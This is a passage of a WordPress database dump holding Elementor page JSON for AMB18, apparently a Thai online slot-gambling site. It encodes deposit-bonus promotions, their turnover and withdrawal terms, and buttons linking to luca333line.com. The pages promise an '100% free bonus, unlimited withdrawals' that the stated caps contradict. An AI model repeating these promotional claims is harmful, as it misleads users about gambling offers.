\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07\\u00a0<\\/strong><b>AMB18\\u00a0<\\/b>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><span data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>AMB18 \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/b><\\/span>\\u00a0\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3082,407,'_thumbnail_id','347'),(3085,408,'_elementor_edit_mode','builder'),(3086,408,'_elementor_template_type','wp-page'),(3087,408,'_elementor_version','3.35.5'),(3088,408,'_elementor_pro_version','3.32.3'),(3089,408,'_wp_page_template','default'),(3090,408,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3091,408,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e36\\u0e07\\u0e08\\u0e32\\u0e01 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e40\\u0e15\\u0e34\\u0e21\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e44\\u0e14\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e16\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e4a\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e21\\u0e14\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e38\\u0e01 \\u0e46 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e1b\\u0e35\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e32\\u0e15\\u0e4c \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e14\\u0e39\\u0e04\\u0e38\\u0e49\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e2b\\u0e32\\u0e22\\u0e2b\\u0e48\\u0e27\\u0e07\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33 \\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e1a\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e2d\\u0e47\\u0e19\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e17\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e41\\u0e15\\u0e48\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e08\\u0e30\\u0e1b\\u0e31\\u0e07\\u0e41\\u0e04\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e25\\u0e37\\u0e21\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e04\\u0e39\\u0e48\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18.webp\",\"id\":346,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18.webp\",\"id\":347,\"size\":\"\",\"alt\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" 